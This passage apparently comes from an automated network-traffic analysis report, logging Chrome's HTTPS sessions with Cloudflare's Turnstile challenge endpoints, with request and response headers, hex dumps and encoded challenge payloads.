                                                            2025-01-06 15:53:52 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:52 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Mon, 06 Jan 2025 15:53:52 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cf-chl-out: i+2Vb7WTuRwHoYydqwgJoghxVNpx/As2F8k=$LTOnzyBqwXiRhOer
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce224befdc328-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:52 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.449772104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:52 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fdce2128ada41f5/1736178831075/-I52yKHnGnwtVFm HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:52 UTC200INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:52 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce227f9f7f5f6-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 15 08 02 00 00 00 bf 8d eb 74 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR*tIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.449773104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:53 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fdce2128ada41f5/1736178831075/-I52yKHnGnwtVFm HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:53 UTC200INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:53 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce22bfff241c3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 15 08 02 00 00 00 bf 8d eb 74 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR*tIDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.449774104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:53 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fdce2128ada41f5/1736178831078/8700c439989e41dbd7c97c2a7e7c33cbc8c768735eb04740b5da280789dc698f/6I2B-pjWRaBgr7q HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:53 UTC143INHTTP/1.1 401 Unauthorized
                                                            Date: Mon, 06 Jan 2025 15:53:53 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            2025-01-06 15:53:53 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 68 77 44 45 4f 5a 69 65 51 64 76 58 79 58 77 71 66 6e 77 7a 79 38 6a 48 61 48 4e 65 73 45 64 41 74 64 6f 6f 42 34 6e 63 61 59 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20ghwDEOZieQdvXyXwqfnwzy8jHaHNesEdAtdooB4ncaY8AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                            2025-01-06 15:53:53 UTC1INData Raw: 4a
                                                            Data Ascii: J


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.449775104.18.94.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:54 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 32233
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: .wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:54 UTC16384OUTData Raw: 76 5f 38 66 64 63 65 32 31 32 38 61 64 61 34 31 66 35 3d 6a 4d 54 68 69 30 6f 67 65 30 65 4b 54 4b 6c 6f 42 4a 54 68 4e 62 4b 74 6f 73 25 32 62 44 2b 75 68 4b 59 70 4d 6f 39 2b 74 68 6f 42 58 59 54 4b 63 2b 7a 30 2b 4b 56 68 4b 43 2b 6b 68 66 65 30 66 2b 4c 42 37 2b 6f 55 48 2b 63 67 73 54 4c 2b 30 4f 2b 70 68 74 74 2b 4b 4a 6f 2b 72 2b 4f 68 74 38 38 2b 41 56 4b 39 2b 6a 45 68 2b 76 2b 30 6b 6f 39 38 37 6b 30 63 2b 66 49 37 72 75 35 2b 6c 70 5a 46 76 6a 46 62 2b 67 52 52 2b 4d 4b 2d 54 56 34 44 72 2b 71 6c 2b 4a 6b 2b 64 30 77 6d 72 52 34 56 2b 4c 70 57 36 55 68 45 65 76 55 69 70 48 71 6d 68 36 6a 30 4c 52 49 65 4d 34 52 4c 30 72 68 35 2b 6f 4f 46 68 61 74 65 46 6f 2b 44 44 48 4a 24 73 31 6c 64 45 68 74 47 70 70 7a 56 39 39 7a 51 63 7a 54 64 4f 54 6a 64
                                                            Data Ascii: v_8fdce2128ada41f5=jMThi0oge0eKTKloBJThNbKtos%2bD+uhKYpMo9+thoBXYTKc+z0+KVhKC+khfe0f+LB7+oUH+cgsTL+0O+phtt+KJo+r+Oht88+AVK9+jEh+v+0ko987k0c+fI7ru5+lpZFvjFb+gRR+MK-TV4Dr+ql+Jk+d0wmrR4V+LpW6UhEevUipHqmh6j0LRIeM4RL0rh5+oOFhateFo+DDHJ$s1ldEhtGppzV99zQczTdOTjd
                                                            2025-01-06 15:53:54 UTC15849OUTData Raw: 44 2b 2b 6f 31 49 37 32 68 2b 4d 2b 6a 2b 71 2b 65 2b 52 39 30 54 63 6e 2b 7a 4c 57 74 48 2b 6f 31 36 79 6e 74 2b 4b 4d 37 62 2b 44 2b 6f 56 6f 75 2b 66 35 74 54 6f 71 2b 63 68 63 54 2b 66 2b 78 2b 74 45 59 67 2b 67 54 71 35 56 76 2b 55 73 76 4d 6f 53 2b 56 56 6f 74 6f 46 65 2d 56 71 35 2b 71 2b 4a 56 4a 62 2b 6a 2b 78 56 71 4f 2b 65 2b 6c 2b 6f 34 2b 64 2b 63 6b 4b 5a 2b 71 2b 59 6b 74 47 6c 6a 68 64 56 4a 69 2b 5a 31 59 63 34 56 6f 76 2b 4c 68 4c 62 4b 32 62 59 68 6a 62 4b 66 2b 61 68 64 62 30 62 4d 71 68 54 4d 4b 43 2b 51 68 6a 4d 4b 6f 2b 6e 68 4e 74 30 6f 2b 5a 56 6a 74 30 4c 2b 35 56 4e 35 30 53 2b 76 56 66 74 4b 59 2b 36 56 66 35 30 57 2b 32 56 54 52 4b 57 2b 70 56 6a 52 4b 4a 2b 75 56 66 52 30 47 2b 51 56 54 4f 4b 46 2b 24 56 55 4f 30 61 2b 6b 6b
                                                            Data Ascii: D++o1I72h+M+j+q+e+R90Tcn+zLWtH+o16ynt+KM7b+D+oVou+f5tToq+chcT+f+x+tEYg+gTq5Vv+UsvMoS+VVotoFe-Vq5+q+JVJb+j+xVqO+e+l+o4+d+ckKZ+q+YktGljhdVJi+Z1Yc4Vov+LhLbK2bYhjbKf+ahdb0bMqhTMKC+QhjMKo+nhNt0o+ZVjt0L+5VN50S+vVftKY+6Vf50W+2VTRKW+pVjRKJ+uVfR0G+QVTOKF+$VUO0a+kk
                                                            2025-01-06 15:53:55 UTC318INHTTP/1.1 200 OK
                                                            Date: Mon, 06 Jan 2025 15:53:54 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 26312
                                                            Connection: close
                                                            cf-chl-gen: PoaovpHuOVPjSqhFMOQlWTA0VwRnvkBEoAFhevn5Cf4dAT5GuvWUx13dWoKXBGkomKk=$fAncxfib7kKU1cGH
                                                            Server: cloudflare
                                                            CF-RAY: 8fdce2341e66c3f5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-06 15:53:55 UTC1051INData Raw: 76 4c 36 77 70 58 36 6b 74 72 79 70 70 38 61 36 74 61 4f 67 79 72 75 77 31 49 2b 56 72 61 61 54 6d 62 43 52 31 59 2b 30 30 4e 57 63 34 39 7a 4d 6f 4e 4b 31 78 4e 4f 6b 79 4e 6a 4c 7a 4c 72 43 37 62 48 42 71 73 33 33 35 73 54 56 36 2f 4c 47 30 39 76 57 2b 4f 33 53 30 63 2f 4f 38 2f 58 54 31 50 6f 46 79 4e 58 6d 34 50 33 39 7a 4d 76 39 7a 51 38 4f 35 75 48 79 36 41 77 4e 41 50 77 42 41 68 34 51 48 65 34 6c 38 2f 45 4c 2b 67 30 4f 44 4f 66 70 45 43 6f 68 44 50 33 72 47 42 49 44 4c 50 51 52 37 69 6f 31 45 66 73 30 4f 68 6f 39 44 78 38 55 45 7a 30 48 4f 42 63 34 4f 6a 77 75 4a 46 52 47 45 42 35 56 4b 46 42 58 51 79 6b 31 4a 79 67 61 55 32 46 62 57 69 30 75 56 43 45 78 56 69 56 63 4f 6c 31 6b 61 33 4a 66 4c 54 46 52 62 6d 56 4c 5a 57 74 30 64 32 6c 31 4e 58 64
                                                            Data Ascii: vL6wpX6ktrypp8a6taOgyruw1I+VraaTmbCR1Y+00NWc49zMoNK1xNOkyNjLzLrC7bHBqs335sTV6/LG09vW+O3S0c/O8/XT1PoFyNXm4P39zMv9zQ8O5uHy6AwNAPwBAh4QHe4l8/EL+g0ODOfpECohDP3rGBIDLPQR7io1Efs0Oho9Dx8UEz0HOBc4OjwuJFRGEB5VKFBXQyk1JygaU2FbWi0uVCExViVcOl1ka3JfLTFRbmVLZWt0d2l1NXd
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 51 72 5a 4f 59 6c 39 58 64 79 4a 75 62 76 63 32 65 30 4b 4c 6e 76 4f 50 41 74 4c 66 73 7a 4e 75 38 75 65 37 69 76 2f 54 65 34 38 54 42 35 75 72 48 73 2f 67 42 2b 65 37 54 42 41 58 59 76 38 44 35 33 66 33 69 33 66 58 63 78 75 48 6a 45 76 7a 52 43 75 7a 6e 79 67 73 4e 48 66 62 36 33 74 66 37 37 64 37 34 47 79 44 6b 2f 42 37 34 35 42 77 6a 44 52 77 71 48 4f 73 44 4e 44 50 77 41 77 2f 71 43 2f 55 55 42 67 67 39 2b 43 6b 75 4e 68 73 62 4e 78 56 42 4d 6b 4d 56 43 52 30 33 4a 30 4a 4b 48 31 42 4d 4e 52 46 49 46 55 73 6e 4d 6a 4d 6d 4b 31 31 52 4d 45 70 66 49 47 49 64 58 55 55 37 4e 6b 6c 58 5a 53 78 6b 4f 45 74 76 58 58 42 4f 56 30 6f 71 61 44 6c 77 54 6e 5a 5a 62 47 31 65 62 6c 52 4d 57 54 39 6a 64 31 39 6f 50 57 78 44 54 6b 56 38 53 46 47 4f 59 45 39 74 68 32
                                                            Data Ascii: QrZOYl9XdyJubvc2e0KLnvOPAtLfszNu8ue7iv/Te48TB5urHs/gB+e7TBAXYv8D53f3i3fXcxuHjEvzRCuznygsNHfb63tf77d74GyDk/B745BwjDRwqHOsDNDPwAw/qC/UUBgg9+CkuNhsbNxVBMkMVCR03J0JKH1BMNRFIFUsnMjMmK11RMEpfIGIdXUU7NklXZSxkOEtvXXBOV0oqaDlwTnZZbG1eblRMWT9jd19oPWxDTkV8SFGOYE9th2
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 70 39 7a 4b 74 64 61 35 33 4e 57 67 30 38 4f 38 79 38 32 72 35 71 66 69 7a 38 72 6a 71 2f 44 46 7a 39 50 72 37 64 62 59 37 72 33 31 33 4e 36 37 39 75 4b 33 2f 51 66 48 36 4f 66 67 34 50 66 61 34 38 77 4f 35 41 7a 74 37 52 50 6c 37 76 58 33 36 2f 63 5a 44 39 7a 70 36 68 59 63 45 78 7a 30 38 39 6f 5a 41 2f 4d 44 35 65 73 6c 34 69 34 6e 38 7a 49 76 4d 67 30 54 4c 42 4d 49 44 43 6f 61 47 6a 6b 77 45 77 30 4e 4a 55 4c 35 4e 53 6f 63 4c 54 6b 68 53 6a 78 49 55 55 42 4c 55 6a 38 56 49 43 38 52 52 69 67 34 4f 6a 77 75 4d 6c 52 4e 4d 44 52 53 51 6b 56 68 57 44 73 31 4e 57 52 42 54 57 52 52 59 31 46 78 4c 6a 52 74 52 6b 63 78 4e 6b 6b 38 58 30 41 36 53 6a 78 42 67 31 6c 6e 55 47 5a 48 5a 6c 69 4d 6a 34 68 43 63 45 68 39 62 34 56 2f 6c 34 64 7a 6a 32 31 78 6d 56 57
                                                            Data Ascii: p9zKtda53NWg08O8y82r5qfiz8rjq/DFz9Pr7dbY7r313N679uK3/QfH6Ofg4Pfa48wO5Azt7RPl7vX36/cZD9zp6hYcExz089oZA/MD5esl4i4n8zIvMg0TLBMIDCoaGjkwEw0NJUL5NSocLTkhSjxIUUBLUj8VIC8RRig4OjwuMlRNMDRSQkVhWDs1NWRBTWRRY1FxLjRtRkcxNkk8X0A6SjxBg1lnUGZHZliMj4hCcEh9b4V/l4dzj21xmVW
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 4c 65 36 34 4c 4c 69 36 62 69 6f 72 63 4c 6f 76 4e 72 78 77 4c 44 30 79 76 44 45 78 2b 69 31 75 75 37 51 74 37 37 50 32 38 54 68 33 67 63 48 35 2b 66 56 35 77 44 4d 36 78 4c 38 2b 2b 6f 53 36 74 38 4c 38 2b 58 57 39 42 72 78 31 39 7a 59 44 66 45 43 4a 51 38 6f 2f 41 44 34 46 69 6e 6f 4a 41 34 45 44 50 73 64 4e 43 55 4c 4b 79 45 44 4b 6a 73 6c 4a 7a 55 37 49 42 49 63 50 7a 63 75 4a 53 45 2f 41 2f 73 6c 47 69 64 41 4f 51 5a 4d 4a 7a 41 38 52 69 31 53 4d 31 6f 30 52 46 70 46 46 43 6f 30 50 68 6b 5a 4f 53 46 44 58 31 68 46 61 54 64 44 4f 53 6f 71 53 44 74 71 50 30 74 43 52 7a 4a 51 51 32 4a 48 55 79 39 50 4f 6c 68 4b 54 49 45 39 62 58 4a 36 58 31 39 37 57 59 56 32 68 31 6c 4e 58 33 74 72 68 6f 35 6a 6c 4a 42 35 56 59 78 5a 6a 32 74 32 63 70 70 36 62 48 68 35
                                                            Data Ascii: Le64LLi6biorcLovNrxwLD0yvDEx+i1uu7Qt77P28Th3gcH5+fV5wDM6xL8++oS6t8L8+XW9Brx19zYDfECJQ8o/AD4FinoJA4EDPsdNCULKyEDKjslJzU7IBIcPzcuJSE/A/slGidAOQZMJzA8Ri1SM1o0RFpFFCo0PhkZOSFDX1hFaTdDOSoqSDtqP0tCRzJQQ2JHUy9POlhKTIE9bXJ6X197WYV2h1lNX3trho5jlJB5VYxZj2t2cpp6bHh5
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 4b 35 71 73 44 76 78 39 48 78 35 4d 44 6c 36 73 37 46 74 74 62 34 30 62 65 38 41 76 7a 75 77 4c 7a 76 2b 2b 55 4a 79 4d 4c 44 33 41 38 43 42 66 48 73 44 75 6e 75 31 51 44 32 46 73 76 73 31 41 6a 64 47 74 6e 66 45 41 51 51 39 64 38 65 34 51 6b 49 46 43 55 74 49 65 33 2b 36 4f 6f 72 37 42 41 73 37 54 41 44 4f 41 63 4b 4c 54 34 31 49 45 42 41 50 7a 77 51 4e 42 55 58 45 6b 44 38 4b 54 68 46 4f 6b 45 2b 53 41 38 52 53 42 45 6c 4a 45 67 71 4a 53 64 48 50 6b 63 6f 54 45 4d 38 57 46 63 30 4d 43 4e 48 4a 45 68 67 54 44 31 75 55 47 42 6d 57 30 70 68 4d 45 77 34 56 7a 56 52 57 47 68 30 57 56 64 79 64 58 49 36 64 32 64 68 55 58 4e 59 59 56 5a 34 57 30 74 34 66 6f 68 4c 67 48 56 6c 56 30 35 34 56 6d 79 58 66 6e 78 66 67 59 4b 41 63 58 6d 55 64 34 46 79 6c 58 70 72 6d
                                                            Data Ascii: K5qsDvx9Hx5MDl6s7Fttb40be8AvzuwLzv++UJyMLD3A8CBfHsDunu1QD2Fsvs1AjdGtnfEAQQ9d8e4QkIFCUtIe3+6Oor7BAs7TADOAcKLT41IEBAPzwQNBUXEkD8KThFOkE+SA8RSBElJEgqJSdHPkcoTEM8WFc0MCNHJEhgTD1uUGBmW0phMEw4VzVRWGh0WVdydXI6d2dhUXNYYVZ4W0t4fohLgHVlV054VmyXfnxfgYKAcXmUd4FylXprm
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 6c 34 4e 58 41 73 2b 62 61 31 37 62 6f 38 64 65 31 37 2f 6a 66 39 66 44 56 33 4e 45 47 78 4c 79 39 44 76 62 45 37 63 6a 38 33 65 59 47 31 4f 58 67 30 41 55 49 39 68 37 63 45 2f 59 68 38 76 44 69 4a 52 73 42 41 78 77 4a 35 75 63 62 41 53 50 34 4a 42 45 69 38 42 59 46 36 41 59 73 47 42 54 32 4b 2f 67 52 39 66 67 38 41 53 46 42 4d 54 51 69 4f 51 55 42 48 55 30 35 48 51 4a 53 4f 77 55 74 55 69 70 4f 44 30 73 57 4f 41 35 4a 50 69 6b 63 54 30 4e 41 48 31 46 61 51 42 35 59 59 55 68 65 57 54 35 46 4f 6d 34 79 55 6c 45 73 4e 47 78 51 65 6a 56 33 55 33 31 6f 64 46 34 35 61 33 68 68 50 47 39 45 52 6e 74 7a 6a 46 35 34 58 32 56 74 66 6f 65 48 58 4a 46 32 5a 58 57 46 61 5a 4b 4f 69 6c 6d 48 66 59 4a 78 6b 32 2b 54 6e 31 32 47 59 5a 52 64 61 47 57 70 67 59 4e 6f 6e 59
                                                            Data Ascii: l4NXAs+ba17bo8de17/jf9fDV3NEGxLy9DvbE7cj83eYG1OXg0AUI9h7cE/Yh8vDiJRsBAxwJ5ucbASP4JBEi8BYF6AYsGBT2K/gR9fg8ASFBMTQiOQUBHU05HQJSOwUtUipOD0sWOA5JPikcT0NAH1FaQB5YYUheWT5FOm4yUlEsNGxQejV3U31odF45a3hhPG9ERntzjF54X2VtfoeHXJF2ZXWFaZKOilmHfYJxk2+Tn12GYZRdaGWpgYNonY
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 31 64 4f 30 35 76 76 64 75 4e 58 41 33 4c 77 41 76 4f 54 41 38 38 6a 70 43 63 33 33 36 42 49 4e 35 66 45 57 31 66 48 76 30 4e 6b 48 32 64 51 59 33 50 62 58 44 66 48 38 33 43 45 55 41 75 41 6a 4b 41 6e 6b 4b 66 6b 49 36 50 45 53 44 65 77 4c 43 68 63 31 2b 52 6f 58 38 7a 6b 4f 46 76 63 39 45 69 50 38 47 78 45 47 41 54 55 57 4b 41 55 4f 4a 69 63 49 54 42 45 78 44 55 39 55 4e 56 6f 61 4f 6a 73 56 4d 30 77 39 47 43 4a 4d 51 6d 45 6d 51 6b 55 67 5a 43 6c 45 4a 55 4e 63 52 79 6b 79 58 7a 49 74 53 31 4a 54 4d 48 56 47 56 54 51 2b 53 6c 67 35 65 34 42 67 50 49 46 77 59 55 46 4b 57 6d 61 4f 54 6e 68 6f 6a 56 4a 75 62 55 31 57 68 48 52 51 6c 58 70 7a 56 56 35 31 58 6c 68 69 6b 48 70 63 5a 6e 71 41 59 61 52 70 69 36 36 6e 72 49 31 6f 68 34 61 50 62 61 47 53 6c 48 42
                                                            Data Ascii: 1dO05vvduNXA3LwAvOTA88jpCc336BIN5fEW1fHv0NkH2dQY3PbXDfH83CEUAuAjKAnkKfkI6PESDewLChc1+RoX8zkOFvc9EiP8GxEGATUWKAUOJicITBExDU9UNVoaOjsVM0w9GCJMQmEmQkUgZClEJUNcRykyXzItS1JTMHVGVTQ+Slg5e4BgPIFwYUFKWmaOTnhojVJubU1WhHRQlXpzVV51XlhikHpcZnqAYaRpi66nrI1oh4aPbaGSlHB
                                                            2025-01-06 15:53:55 UTC1369INData Raw: 4c 6e 79 74 51 47 39 42 4e 44 6e 31 2f 37 63 36 2b 48 62 39 77 34 4c 44 67 66 39 34 2b 4d 51 46 68 4d 57 44 51 62 72 36 78 67 65 47 78 34 46 4a 52 72 77 35 51 63 55 49 77 67 71 35 53 50 74 36 42 76 75 4b 79 67 4a 39 68 6b 31 2b 53 51 59 4f 6a 49 7a 48 44 37 35 4e 77 4c 38 4d 53 58 35 52 51 51 34 48 6b 41 33 44 7a 46 4e 43 68 45 64 4e 41 39 4c 44 6a 6b 75 4b 45 68 46 50 43 6f 70 51 43 41 67 46 6d 45 65 58 44 70 48 59 32 5a 55 62 57 46 72 4c 6b 38 78 61 6c 35 78 4c 6e 68 4b 62 47 4d 37 5a 33 6b 32 62 7a 4a 39 4f 6a 31 57 5a 48 2b 43 64 49 6c 39 50 55 70 73 54 59 5a 2b 6a 55 74 65 5a 6f 68 2f 56 33 69 56 56 49 64 4f 6a 5a 4a 34 6d 6c 6c 62 6e 48 61 59 6a 32 65 57 70 57 4f 45 70 6d 56 6e 70 32 4b 74 61 34 79 75 62 61 71 77 69 71 79 6a 65 36 6d 35 64 35 69 36
                                                            Data Ascii: LnytQG9BNDn1/7c6+Hb9w4LDgf94+MQFhMWDQbr6xgeGx4FJRrw5QcUIwgq5SPt6BvuKygJ9hk1+SQYOjIzHD75NwL8MSX5RQQ4HkA3DzFNChEdNA9LDjkuKEhFPCopQCAgFmEeXDpHY2ZUbWFrLk8xal5xLnhKbGM7Z3k2bzJ9Oj1WZH+CdIl9PUpsTYZ+jUteZoh/V3iVVIdOjZJ4mllbnHaYj2eWpWOEpmVnp2Kta4yubaqwiqyje6m5d5i6


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.449776104.18.95.414433132C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-06 15:53:56 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-06 15:53:56 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Mon, 06 Jan 2025 15:53:56 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: TuZYT29krw2zK4obb9X8CNYaexyzbo7vySA=$Qc1aoGWssBOC36Dl
                                                            Server: cloudflare
